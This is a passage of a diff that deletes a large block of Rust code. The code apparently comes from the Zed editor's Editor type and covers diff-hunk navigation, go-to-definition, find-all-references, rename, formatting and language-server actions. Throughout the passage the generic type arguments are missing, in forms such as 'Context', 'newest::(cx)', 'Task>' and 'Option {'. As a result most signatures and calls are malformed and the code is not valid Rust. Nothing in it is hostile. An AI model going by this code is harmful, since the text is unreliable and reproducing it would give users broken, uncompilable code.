next_diagnostic.range.start..next_diagnostic.range.start, - ]) - }); - self.activate_diagnostics(buffer_id, next_diagnostic, window, cx); - self.refresh_inline_completion(false, true, window, cx); - } - - fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let snapshot = self.snapshot(window, cx); - let selection = self.selections.newest::(cx); - self.go_to_hunk_before_or_after_position( - &snapshot, - selection.head(), - Direction::Next, - window, - cx, - ); - } - - pub fn go_to_hunk_before_or_after_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) { - let row = if direction == Direction::Next { - self.hunk_after_position(snapshot, position) - .map(|hunk| hunk.row_range.start) - } else { - self.hunk_before_position(snapshot, position) - }; - - if let Some(row) = row { - let destination = Point::new(row.0, 0); - let autoscroll = Autoscroll::center(); - - self.unfold_ranges(&[destination..destination], false, false, cx); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges([destination..destination]); - }); - } - } - - fn hunk_after_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - ) -> Option { - snapshot - .buffer_snapshot - .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) - .find(|hunk| hunk.row_range.start.0 > position.row) - .or_else(|| { - snapshot - .buffer_snapshot - .diff_hunks_in_range(Point::zero()..position) - .find(|hunk| hunk.row_range.end.0 < position.row) - }) - } - - fn go_to_prev_hunk( - &mut self, - _: &GoToPreviousHunk, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let snapshot = self.snapshot(window, cx); - let selection = self.selections.newest::(cx); - self.go_to_hunk_before_or_after_position( - &snapshot, - selection.head(), - Direction::Prev, - window, - cx, - ); - } - - fn hunk_before_position( - &mut self, - snapshot: &EditorSnapshot, - position: Point, - ) -> Option { - snapshot - .buffer_snapshot - .diff_hunk_before(position) - .or_else(|| snapshot.buffer_snapshot.diff_hunk_before(Point::MAX)) - } - - fn go_to_next_change( - &mut self, - _: &GoToNextChange, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(selections) = self - .change_list - .next_change(1, Direction::Next) - .map(|s| s.to_vec()) - { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let map = s.display_map(); - s.select_display_ranges(selections.iter().map(|a| { - let point = a.to_display_point(&map); - point..point - })) - }) - } - } - - fn go_to_previous_change( - &mut self, - _: &GoToPreviousChange, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(selections) = self - .change_list - .next_change(1, Direction::Prev) - .map(|s| s.to_vec()) - { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let map = s.display_map(); - s.select_display_ranges(selections.iter().map(|a| { - let point = a.to_display_point(&map); - point..point - })) - }) - } - } - - fn go_to_line( - &mut self, - position: Anchor, - highlight_color: Option, - window: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.snapshot(window, cx).display_snapshot; - let position = position.to_point(&snapshot.buffer_snapshot); - let start = snapshot - .buffer_snapshot - .clip_point(Point::new(position.row, 0), Bias::Left); - let end = start + Point::new(1, 0); - let start = snapshot.buffer_snapshot.anchor_before(start); - let end = snapshot.buffer_snapshot.anchor_before(end); - - self.highlight_rows::( - start..end, - highlight_color - .unwrap_or_else(|| cx.theme().colors().editor_highlighted_line_background), - Default::default(), - cx, - ); - self.request_autoscroll(Autoscroll::center().for_anchor(start), cx); - } - - pub fn go_to_definition( - &mut self, - _: &GoToDefinition, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let definition = - self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, false, window, cx); - let fallback_strategy = EditorSettings::get_global(cx).go_to_definition_fallback; - cx.spawn_in(window, async move |editor, cx| { - if definition.await? == Navigated::Yes { - return Ok(Navigated::Yes); - } - match fallback_strategy { - GoToDefinitionFallback::None => Ok(Navigated::No), - GoToDefinitionFallback::FindAllReferences => { - match editor.update_in(cx, |editor, window, cx| { - editor.find_all_references(&FindAllReferences, window, cx) - })? { - Some(references) => references.await, - None => Ok(Navigated::No), - } - } - } - }) - } - - pub fn go_to_declaration( - &mut self, - _: &GoToDeclaration, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, false, window, cx) - } - - pub fn go_to_declaration_split( - &mut self, - _: &GoToDeclaration, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Declaration, true, window, cx) - } - - pub fn go_to_implementation( - &mut self, - _: &GoToImplementation, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, false, window, cx) - } - - pub fn go_to_implementation_split( - &mut self, - _: &GoToImplementationSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Implementation, true, window, cx) - } - - pub fn go_to_type_definition( - &mut self, - _: &GoToTypeDefinition, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Type, false, window, cx) - } - - pub fn go_to_definition_split( - &mut self, - _: &GoToDefinitionSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Symbol, true, window, cx) - } - - pub fn go_to_type_definition_split( - &mut self, - _: &GoToTypeDefinitionSplit, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - self.go_to_definition_of_kind(GotoDefinitionKind::Type, true, window, cx) - } - - fn go_to_definition_of_kind( - &mut self, - kind: GotoDefinitionKind, - split: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let Some(provider) = self.semantics_provider.clone() else { - return Task::ready(Ok(Navigated::No)); - }; - let head = self.selections.newest::(cx).head(); - let buffer = self.buffer.read(cx); - let (buffer, head) = if let Some(text_anchor) = buffer.text_anchor_for_position(head, cx) { - text_anchor - } else { - return Task::ready(Ok(Navigated::No)); - }; - - let Some(definitions) = provider.definitions(&buffer, head, kind, cx) else { - return Task::ready(Ok(Navigated::No)); - }; - - cx.spawn_in(window, async move |editor, cx| { - let definitions = definitions.await?; - let navigated = editor - .update_in(cx, |editor, window, cx| { - editor.navigate_to_hover_links( - Some(kind), - definitions - .into_iter() - .filter(|location| { - hover_links::exclude_link_to_position(&buffer, &head, location, cx) - }) - .map(HoverLink::Text) - .collect::>(), - split, - window, - cx, - ) - })? - .await?; - anyhow::Ok(navigated) - }) - } - - pub fn open_url(&mut self, _: &OpenUrl, window: &mut Window, cx: &mut Context) { - let selection = self.selections.newest_anchor(); - let head = selection.head(); - let tail = selection.tail(); - - let Some((buffer, start_position)) = - self.buffer.read(cx).text_anchor_for_position(head, cx) - else { - return; - }; - - let end_position = if head != tail { - let Some((_, pos)) = self.buffer.read(cx).text_anchor_for_position(tail, cx) else { - return; - }; - Some(pos) - } else { - None - }; - - let url_finder = cx.spawn_in(window, async move |editor, cx| { - let url = if let Some(end_pos) = end_position { - find_url_from_range(&buffer, start_position..end_pos, cx.clone()) - } else { - find_url(&buffer, start_position, cx.clone()).map(|(_, url)| url) - }; - - if let Some(url) = url { - editor.update(cx, |_, cx| { - cx.open_url(&url); - }) - } else { - Ok(()) - } - }); - - url_finder.detach(); - } - - pub fn open_selected_filename( - &mut self, - _: &OpenSelectedFilename, - window: &mut Window, - cx: &mut Context, - ) { - let Some(workspace) = self.workspace() else { - return; - }; - - let position = self.selections.newest_anchor().head(); - - let Some((buffer, buffer_position)) = - self.buffer.read(cx).text_anchor_for_position(position, cx) - else { - return; - }; - - let project = self.project.clone(); - - cx.spawn_in(window, async move |_, cx| { - let result = find_file(&buffer, project, buffer_position, cx).await; - - if let Some((_, path)) = result { - workspace - .update_in(cx, |workspace, window, cx| { - workspace.open_resolved_path(path, window, cx) - })? - .await?; - } - anyhow::Ok(()) - }) - .detach(); - } - - pub(crate) fn navigate_to_hover_links( - &mut self, - kind: Option, - mut definitions: Vec, - split: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - // If there is one definition, just open it directly - if definitions.len() == 1 { - let definition = definitions.pop().unwrap(); - - enum TargetTaskResult { - Location(Option), - AlreadyNavigated, - } - - let target_task = match definition { - HoverLink::Text(link) => { - Task::ready(anyhow::Ok(TargetTaskResult::Location(Some(link.target)))) - } - HoverLink::InlayHint(lsp_location, server_id) => { - let computation = - self.compute_target_location(lsp_location, server_id, window, cx); - cx.background_spawn(async move { - let location = computation.await?; - Ok(TargetTaskResult::Location(location)) - }) - } - HoverLink::Url(url) => { - cx.open_url(&url); - Task::ready(Ok(TargetTaskResult::AlreadyNavigated)) - } - HoverLink::File(path) => { - if let Some(workspace) = self.workspace() { - cx.spawn_in(window, async move |_, cx| { - workspace - .update_in(cx, |workspace, window, cx| { - workspace.open_resolved_path(path, window, cx) - })? - .await - .map(|_| TargetTaskResult::AlreadyNavigated) - }) - } else { - Task::ready(Ok(TargetTaskResult::Location(None))) - } - } - }; - cx.spawn_in(window, async move |editor, cx| { - let target = match target_task.await.context("target resolution task")? { - TargetTaskResult::AlreadyNavigated => return Ok(Navigated::Yes), - TargetTaskResult::Location(None) => return Ok(Navigated::No), - TargetTaskResult::Location(Some(target)) => target, - }; - - editor.update_in(cx, |editor, window, cx| { - let Some(workspace) = editor.workspace() else { - return Navigated::No; - }; - let pane = workspace.read(cx).active_pane().clone(); - - let range = target.range.to_point(target.buffer.read(cx)); - let range = editor.range_for_match(&range); - let range = collapse_multiline_range(range); - - if !split - && Some(&target.buffer) == editor.buffer.read(cx).as_singleton().as_ref() - { - editor.go_to_singleton_buffer_range(range.clone(), window, cx); - } else { - window.defer(cx, move |window, cx| { - let target_editor: Entity = - workspace.update(cx, |workspace, cx| { - let pane = if split { - workspace.adjacent_pane(window, cx) - } else { - workspace.active_pane().clone() - }; - - workspace.open_project_item( - pane, - target.buffer.clone(), - true, - true, - window, - cx, - ) - }); - target_editor.update(cx, |target_editor, cx| { - // When selecting a definition in a different buffer, disable the nav history - // to avoid creating a history entry at the previous cursor location. - pane.update(cx, |pane, _| pane.disable_history()); - target_editor.go_to_singleton_buffer_range(range, window, cx); - pane.update(cx, |pane, _| pane.enable_history()); - }); - }); - } - Navigated::Yes - }) - }) - } else if !definitions.is_empty() { - cx.spawn_in(window, async move |editor, cx| { - let (title, location_tasks, workspace) = editor - .update_in(cx, |editor, window, cx| { - let tab_kind = match kind { - Some(GotoDefinitionKind::Implementation) => "Implementations", - _ => "Definitions", - }; - let title = definitions - .iter() - .find_map(|definition| match definition { - HoverLink::Text(link) => link.origin.as_ref().map(|origin| { - let buffer = origin.buffer.read(cx); - format!( - "{} for {}", - tab_kind, - buffer - .text_for_range(origin.range.clone()) - .collect::() - ) - }), - HoverLink::InlayHint(_, _) => None, - HoverLink::Url(_) => None, - HoverLink::File(_) => None, - }) - .unwrap_or(tab_kind.to_string()); - let location_tasks = definitions - .into_iter() - .map(|definition| match definition { - HoverLink::Text(link) => Task::ready(Ok(Some(link.target))), - HoverLink::InlayHint(lsp_location, server_id) => editor - .compute_target_location(lsp_location, server_id, window, cx), - HoverLink::Url(_) => Task::ready(Ok(None)), - HoverLink::File(_) => Task::ready(Ok(None)), - }) - .collect::>(); - (title, location_tasks, editor.workspace().clone()) - }) - .context("location tasks preparation")?; - - let locations = future::join_all(location_tasks) - .await - .into_iter() - .filter_map(|location| location.transpose()) - .collect::>() - .context("location tasks")?; - - let Some(workspace) = workspace else { - return Ok(Navigated::No); - }; - let opened = workspace - .update_in(cx, |workspace, window, cx| { - Self::open_locations_in_multibuffer( - workspace, - locations, - title, - split, - MultibufferSelectionMode::First, - window, - cx, - ) - }) - .ok(); - - anyhow::Ok(Navigated::from_bool(opened.is_some())) - }) - } else { - Task::ready(Ok(Navigated::No)) - } - } - - fn compute_target_location( - &self, - lsp_location: lsp::Location, - server_id: LanguageServerId, - window: &mut Window, - cx: &mut Context, - ) -> Task>> { - let Some(project) = self.project.clone() else { - return Task::ready(Ok(None)); - }; - - cx.spawn_in(window, async move |editor, cx| { - let location_task = editor.update(cx, |_, cx| { - project.update(cx, |project, cx| { - let language_server_name = project - .language_server_statuses(cx) - .find(|(id, _)| server_id == *id) - .map(|(_, status)| LanguageServerName::from(status.name.as_str())); - language_server_name.map(|language_server_name| { - project.open_local_buffer_via_lsp( - lsp_location.uri.clone(), - server_id, - language_server_name, - cx, - ) - }) - }) - })?; - let location = match location_task { - Some(task) => Some({ - let target_buffer_handle = task.await.context("open local buffer")?; - let range = target_buffer_handle.update(cx, |target_buffer, _| { - let target_start = target_buffer - .clip_point_utf16(point_from_lsp(lsp_location.range.start), Bias::Left); - let target_end = target_buffer - .clip_point_utf16(point_from_lsp(lsp_location.range.end), Bias::Left); - target_buffer.anchor_after(target_start) - ..target_buffer.anchor_before(target_end) - })?; - Location { - buffer: target_buffer_handle, - range, - } - }), - None => None, - }; - Ok(location) - }) - } - - pub fn find_all_references( - &mut self, - _: &FindAllReferences, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - let selection = self.selections.newest::(cx); - let multi_buffer = self.buffer.read(cx); - let head = selection.head(); - - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let head_anchor = multi_buffer_snapshot.anchor_at( - head, - if head < selection.tail() { - Bias::Right - } else { - Bias::Left - }, - ); - - match self - .find_all_references_task_sources - .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) - { - Ok(_) => { - log::info!( - "Ignoring repeated FindAllReferences invocation with the position of already running task" - ); - return None; - } - Err(i) => { - self.find_all_references_task_sources.insert(i, head_anchor); - } - } - - let (buffer, head) = multi_buffer.text_anchor_for_position(head, cx)?; - let workspace = self.workspace()?; - let project = workspace.read(cx).project().clone(); - let references = project.update(cx, |project, cx| project.references(&buffer, head, cx)); - Some(cx.spawn_in(window, async move |editor, cx| { - let _cleanup = cx.on_drop(&editor, move |editor, _| { - if let Ok(i) = editor - .find_all_references_task_sources - .binary_search_by(|anchor| anchor.cmp(&head_anchor, &multi_buffer_snapshot)) - { - editor.find_all_references_task_sources.remove(i); - } - }); - - let locations = references.await?; - if locations.is_empty() { - return anyhow::Ok(Navigated::No); - } - - workspace.update_in(cx, |workspace, window, cx| { - let title = locations - .first() - .as_ref() - .map(|location| { - let buffer = location.buffer.read(cx); - format!( - "References to `{}`", - buffer - .text_for_range(location.range.clone()) - .collect::() - ) - }) - .unwrap(); - Self::open_locations_in_multibuffer( - workspace, - locations, - title, - false, - MultibufferSelectionMode::First, - window, - cx, - ); - Navigated::Yes - }) - })) - } - - /// Opens a multibuffer with the given project locations in it - pub fn open_locations_in_multibuffer( - workspace: &mut Workspace, - mut locations: Vec, - title: String, - split: bool, - multibuffer_selection_mode: MultibufferSelectionMode, - window: &mut Window, - cx: &mut Context, - ) { - // If there are multiple definitions, open them in a multibuffer - locations.sort_by_key(|location| location.buffer.read(cx).remote_id()); - let mut locations = locations.into_iter().peekable(); - let mut ranges: Vec> = Vec::new(); - let capability = workspace.project().read(cx).capability(); - - let excerpt_buffer = cx.new(|cx| { - let mut multibuffer = MultiBuffer::new(capability); - while let Some(location) = locations.next() { - let buffer = location.buffer.read(cx); - let mut ranges_for_buffer = Vec::new(); - let range = location.range.to_point(buffer); - ranges_for_buffer.push(range.clone()); - - while let Some(next_location) = locations.peek() { - if next_location.buffer == location.buffer { - ranges_for_buffer.push(next_location.range.to_point(buffer)); - locations.next(); - } else { - break; - } - } - - ranges_for_buffer.sort_by_key(|range| (range.start, Reverse(range.end))); - let (new_ranges, _) = multibuffer.set_excerpts_for_path( - PathKey::for_buffer(&location.buffer, cx), - location.buffer.clone(), - ranges_for_buffer, - DEFAULT_MULTIBUFFER_CONTEXT, - cx, - ); - ranges.extend(new_ranges) - } - - multibuffer.with_title(title) - }); - - let editor = cx.new(|cx| { - Editor::for_multibuffer( - excerpt_buffer, - Some(workspace.project().clone()), - window, - cx, - ) - }); - editor.update(cx, |editor, cx| { - match multibuffer_selection_mode { - MultibufferSelectionMode::First => { - if let Some(first_range) = ranges.first() { - editor.change_selections(None, window, cx, |selections| { - selections.clear_disjoint(); - selections.select_anchor_ranges(std::iter::once(first_range.clone())); - }); - } - editor.highlight_background::( - &ranges, - |theme| theme.editor_highlighted_line_background, - cx, - ); - } - MultibufferSelectionMode::All => { - editor.change_selections(None, window, cx, |selections| { - selections.clear_disjoint(); - selections.select_anchor_ranges(ranges); - }); - } - } - editor.register_buffers_with_language_servers(cx); - }); - - let item = Box::new(editor); - let item_id = item.item_id(); - - if split { - workspace.split_item(SplitDirection::Right, item.clone(), window, cx); - } else { - if PreviewTabsSettings::get_global(cx).enable_preview_from_code_navigation { - let (preview_item_id, preview_item_idx) = - workspace.active_pane().update(cx, |pane, _| { - (pane.preview_item_id(), pane.preview_item_idx()) - }); - - workspace.add_item_to_active_pane(item.clone(), preview_item_idx, true, window, cx); - - if let Some(preview_item_id) = preview_item_id { - workspace.active_pane().update(cx, |pane, cx| { - pane.remove_item(preview_item_id, false, false, window, cx); - }); - } - } else { - workspace.add_item_to_active_pane(item.clone(), None, true, window, cx); - } - } - workspace.active_pane().update(cx, |pane, cx| { - pane.set_preview_item_id(Some(item_id), cx); - }); - } - - pub fn rename( - &mut self, - _: &Rename, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - use language::ToOffset as _; - - let provider = self.semantics_provider.clone()?; - let selection = self.selections.newest_anchor().clone(); - let (cursor_buffer, cursor_buffer_position) = self - .buffer - .read(cx) - .text_anchor_for_position(selection.head(), cx)?; - let (tail_buffer, cursor_buffer_position_end) = self - .buffer - .read(cx) - .text_anchor_for_position(selection.tail(), cx)?; - if tail_buffer != cursor_buffer { - return None; - } - - let snapshot = cursor_buffer.read(cx).snapshot(); - let cursor_buffer_offset = cursor_buffer_position.to_offset(&snapshot); - let cursor_buffer_offset_end = cursor_buffer_position_end.to_offset(&snapshot); - let prepare_rename = provider - .range_for_rename(&cursor_buffer, cursor_buffer_position, cx) - .unwrap_or_else(|| Task::ready(Ok(None))); - drop(snapshot); - - Some(cx.spawn_in(window, async move |this, cx| { - let rename_range = if let Some(range) = prepare_rename.await? { - Some(range) - } else { - this.update(cx, |this, cx| { - let buffer = this.buffer.read(cx).snapshot(cx); - let mut buffer_highlights = this - .document_highlights_for_position(selection.head(), &buffer) - .filter(|highlight| { - highlight.start.excerpt_id == selection.head().excerpt_id - && highlight.end.excerpt_id == selection.head().excerpt_id - }); - buffer_highlights - .next() - .map(|highlight| highlight.start.text_anchor..highlight.end.text_anchor) - })? - }; - if let Some(rename_range) = rename_range { - this.update_in(cx, |this, window, cx| { - let snapshot = cursor_buffer.read(cx).snapshot(); - let rename_buffer_range = rename_range.to_offset(&snapshot); - let cursor_offset_in_rename_range = - cursor_buffer_offset.saturating_sub(rename_buffer_range.start); - let cursor_offset_in_rename_range_end = - cursor_buffer_offset_end.saturating_sub(rename_buffer_range.start); - - this.take_rename(false, window, cx); - let buffer = this.buffer.read(cx).read(cx); - let cursor_offset = selection.head().to_offset(&buffer); - let rename_start = cursor_offset.saturating_sub(cursor_offset_in_rename_range); - let rename_end = rename_start + rename_buffer_range.len(); - let range = buffer.anchor_before(rename_start)..buffer.anchor_after(rename_end); - let mut old_highlight_id = None; - let old_name: Arc = buffer - .chunks(rename_start..rename_end, true) - .map(|chunk| { - if old_highlight_id.is_none() { - old_highlight_id = chunk.syntax_highlight_id; - } - chunk.text - }) - .collect::() - .into(); - - drop(buffer); - - // Position the selection in the rename editor so that it matches the current selection. - this.show_local_selections = false; - let rename_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); - editor.buffer.update(cx, |buffer, cx| { - buffer.edit([(0..0, old_name.clone())], None, cx) - }); - let rename_selection_range = match cursor_offset_in_rename_range - .cmp(&cursor_offset_in_rename_range_end) - { - Ordering::Equal => { - editor.select_all(&SelectAll, window, cx); - return editor; - } - Ordering::Less => { - cursor_offset_in_rename_range..cursor_offset_in_rename_range_end - } - Ordering::Greater => { - cursor_offset_in_rename_range_end..cursor_offset_in_rename_range - } - }; - if rename_selection_range.end > old_name.len() { - editor.select_all(&SelectAll, window, cx); - } else { - editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([rename_selection_range]); - }); - } - editor - }); - cx.subscribe(&rename_editor, |_, _, e: &EditorEvent, cx| { - if e == &EditorEvent::Focused { - cx.emit(EditorEvent::FocusedIn) - } - }) - .detach(); - - let write_highlights = - this.clear_background_highlights::(cx); - let read_highlights = - this.clear_background_highlights::(cx); - let ranges = write_highlights - .iter() - .flat_map(|(_, ranges)| ranges.iter()) - .chain(read_highlights.iter().flat_map(|(_, ranges)| ranges.iter())) - .cloned() - .collect(); - - this.highlight_text::( - ranges, - HighlightStyle { - fade_out: Some(0.6), - ..Default::default() - }, - cx, - ); - let rename_focus_handle = rename_editor.focus_handle(cx); - window.focus(&rename_focus_handle); - let block_id = this.insert_blocks( - [BlockProperties { - style: BlockStyle::Flex, - placement: BlockPlacement::Below(range.start), - height: Some(1), - render: Arc::new({ - let rename_editor = rename_editor.clone(); - move |cx: &mut BlockContext| { - let mut text_style = cx.editor_style.text.clone(); - if let Some(highlight_style) = old_highlight_id - .and_then(|h| h.style(&cx.editor_style.syntax)) - { - text_style = text_style.highlight(highlight_style); - } - div() - .block_mouse_down() - .pl(cx.anchor_x) - .child(EditorElement::new( - &rename_editor, - EditorStyle { - background: cx.theme().system().transparent, - local_player: cx.editor_style.local_player, - text: text_style, - scrollbar_width: cx.editor_style.scrollbar_width, - syntax: cx.editor_style.syntax.clone(), - status: cx.editor_style.status.clone(), - inlay_hints_style: HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..make_inlay_hints_style(cx.app) - }, - inline_completion_styles: make_suggestion_styles( - cx.app, - ), - ..EditorStyle::default() - }, - )) - .into_any_element() - } - }), - priority: 0, - }], - Some(Autoscroll::fit()), - cx, - )[0]; - this.pending_rename = Some(RenameState { - range, - old_name, - editor: rename_editor, - block_id, - }); - })?; - } - - Ok(()) - })) - } - - pub fn confirm_rename( - &mut self, - _: &ConfirmRename, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - let rename = self.take_rename(false, window, cx)?; - let workspace = self.workspace()?.downgrade(); - let (buffer, start) = self - .buffer - .read(cx) - .text_anchor_for_position(rename.range.start, cx)?; - let (end_buffer, _) = self - .buffer - .read(cx) - .text_anchor_for_position(rename.range.end, cx)?; - if buffer != end_buffer { - return None; - } - - let old_name = rename.old_name; - let new_name = rename.editor.read(cx).text(cx); - - let rename = self.semantics_provider.as_ref()?.perform_rename( - &buffer, - start, - new_name.clone(), - cx, - )?; - - Some(cx.spawn_in(window, async move |editor, cx| { - let project_transaction = rename.await?; - Self::open_project_transaction( - &editor, - workspace, - project_transaction, - format!("Rename: {} → {}", old_name, new_name), - cx, - ) - .await?; - - editor.update(cx, |editor, cx| { - editor.refresh_document_highlights(cx); - })?; - Ok(()) - })) - } - - fn take_rename( - &mut self, - moving_cursor: bool, - window: &mut Window, - cx: &mut Context, - ) -> Option { - let rename = self.pending_rename.take()?; - if rename.editor.focus_handle(cx).is_focused(window) { - window.focus(&self.focus_handle); - } - - self.remove_blocks( - [rename.block_id].into_iter().collect(), - Some(Autoscroll::fit()), - cx, - ); - self.clear_highlights::(cx); - self.show_local_selections = true; - - if moving_cursor { - let cursor_in_rename_editor = rename.editor.update(cx, |editor, cx| { - editor.selections.newest::(cx).head() - }); - - // Update the selection to match the position of the selection inside - // the rename editor. - let snapshot = self.buffer.read(cx).read(cx); - let rename_range = rename.range.to_offset(&snapshot); - let cursor_in_editor = snapshot - .clip_offset(rename_range.start + cursor_in_rename_editor, Bias::Left) - .min(rename_range.end); - drop(snapshot); - - self.change_selections(None, window, cx, |s| { - s.select_ranges(vec![cursor_in_editor..cursor_in_editor]) - }); - } else { - self.refresh_document_highlights(cx); - } - - Some(rename) - } - - pub fn pending_rename(&self) -> Option<&RenameState> { - self.pending_rename.as_ref() - } - - fn format( - &mut self, - _: &Format, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - - Some(self.perform_format( - project, - FormatTrigger::Manual, - FormatTarget::Buffers, - window, - cx, - )) - } - - fn format_selections( - &mut self, - _: &FormatSelections, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - - let ranges = self - .selections - .all_adjusted(cx) - .into_iter() - .map(|selection| selection.range()) - .collect_vec(); - - Some(self.perform_format( - project, - FormatTrigger::Manual, - FormatTarget::Ranges(ranges), - window, - cx, - )) - } - - fn perform_format( - &mut self, - project: Entity, - trigger: FormatTrigger, - target: FormatTarget, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let buffer = self.buffer.clone(); - let (buffers, target) = match target { - FormatTarget::Buffers => { - let mut buffers = buffer.read(cx).all_buffers(); - if trigger == FormatTrigger::Save { - buffers.retain(|buffer| buffer.read(cx).is_dirty()); - } - (buffers, LspFormatTarget::Buffers) - } - FormatTarget::Ranges(selection_ranges) => { - let multi_buffer = buffer.read(cx); - let snapshot = multi_buffer.read(cx); - let mut buffers = HashSet::default(); - let mut buffer_id_to_ranges: BTreeMap>> = - BTreeMap::new(); - for selection_range in selection_ranges { - for (buffer, buffer_range, _) in - snapshot.range_to_buffer_ranges(selection_range) - { - let buffer_id = buffer.remote_id(); - let start = buffer.anchor_before(buffer_range.start); - let end = buffer.anchor_after(buffer_range.end); - buffers.insert(multi_buffer.buffer(buffer_id).unwrap()); - buffer_id_to_ranges - .entry(buffer_id) - .and_modify(|buffer_ranges| buffer_ranges.push(start..end)) - .or_insert_with(|| vec![start..end]); - } - } - (buffers, LspFormatTarget::Ranges(buffer_id_to_ranges)) - } - }; - - let transaction_id_prev = buffer.read_with(cx, |b, cx| b.last_transaction_id(cx)); - let selections_prev = transaction_id_prev - .and_then(|transaction_id_prev| { - // default to selections as they were after the last edit, if we have them, - // instead of how they are now. - // This will make it so that editing, moving somewhere else, formatting, then undoing the format - // will take you back to where you made the last edit, instead of staying where you scrolled - self.selection_history - .transaction(transaction_id_prev) - .map(|t| t.0.clone()) - }) - .unwrap_or_else(|| { - log::info!("Failed to determine selections from before format. Falling back to selections when format was initiated"); - self.selections.disjoint_anchors() - }); - - let mut timeout = cx.background_executor().timer(FORMAT_TIMEOUT).fuse(); - let format = project.update(cx, |project, cx| { - project.format(buffers, target, true, trigger, cx) - }); - - cx.spawn_in(window, async move |editor, cx| { - let transaction = futures::select_biased! { - transaction = format.log_err().fuse() => transaction, - () = timeout => { - log::warn!("timed out waiting for formatting"); - None - } - }; - - buffer - .update(cx, |buffer, cx| { - if let Some(transaction) = transaction { - if !buffer.is_singleton() { - buffer.push_transaction(&transaction.0, cx); - } - } - cx.notify(); - }) - .ok(); - - if let Some(transaction_id_now) = - buffer.read_with(cx, |b, cx| b.last_transaction_id(cx))? - { - let has_new_transaction = transaction_id_prev != Some(transaction_id_now); - if has_new_transaction { - _ = editor.update(cx, |editor, _| { - editor - .selection_history - .insert_transaction(transaction_id_now, selections_prev); - }); - } - } - - Ok(()) - }) - } - - fn organize_imports( - &mut self, - _: &OrganizeImports, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let project = match &self.project { - Some(project) => project.clone(), - None => return None, - }; - Some(self.perform_code_action_kind( - project, - CodeActionKind::SOURCE_ORGANIZE_IMPORTS, - window, - cx, - )) - } - - fn perform_code_action_kind( - &mut self, - project: Entity, - kind: CodeActionKind, - window: &mut Window, - cx: &mut Context, - ) -> Task> { - let buffer = self.buffer.clone(); - let buffers = buffer.read(cx).all_buffers(); - let mut timeout = cx.background_executor().timer(CODE_ACTION_TIMEOUT).fuse(); - let apply_action = project.update(cx, |project, cx| { - project.apply_code_action_kind(buffers, kind, true, cx) - }); - cx.spawn_in(window, async move |_, cx| { - let transaction = futures::select_biased! { - () = timeout => { - log::warn!("timed out waiting for executing code action"); - None - } - transaction = apply_action.log_err().fuse() => transaction, - }; - buffer - .update(cx, |buffer, cx| { - // check if we need this - if let Some(transaction) = transaction { - if !buffer.is_singleton() { - buffer.push_transaction(&transaction.0, cx); - } - } - cx.notify(); - }) - .ok(); - Ok(()) - }) - } - - fn restart_language_server( - &mut self, - _: &RestartLanguageServer, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.clone() { - self.buffer.update(cx, |multi_buffer, cx| { - project.update(cx, |project, cx| { - project.restart_language_servers_for_buffers( - multi_buffer.all_buffers().into_iter().collect(), - cx, - ); - }); - }) - } - } - - fn stop_language_server( - &mut self, - _: &StopLanguageServer, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.clone() { - self.buffer.update(cx, |multi_buffer, cx| { - project.update(cx, |project, cx| { - project.stop_language_servers_for_buffers( - multi_buffer.all_buffers().into_iter().collect(), - cx, - ); - cx.emit(project::Event::RefreshInlayHints); - }); - }); - } - } - - fn cancel_language_server_work( - workspace: &mut Workspace, - _: &actions::CancelLanguageServerWork, - _: &mut Window, - cx: &mut Context, - ) { - let project = workspace.project(); - let buffers = workspace - .active_item(cx) - .and_then(|item| item.act_as::(cx)) - .map_or(HashSet::default(), |editor| { - editor.read(cx).buffer.read(cx).all_buffers() - }); - project.update(cx, |project, cx| { - project.cancel_language_server_work_for_buffers(buffers, cx); - }); - } - - fn show_character_palette( - &mut self, - _: &ShowCharacterPalette, - window: &mut Window, - _: &mut 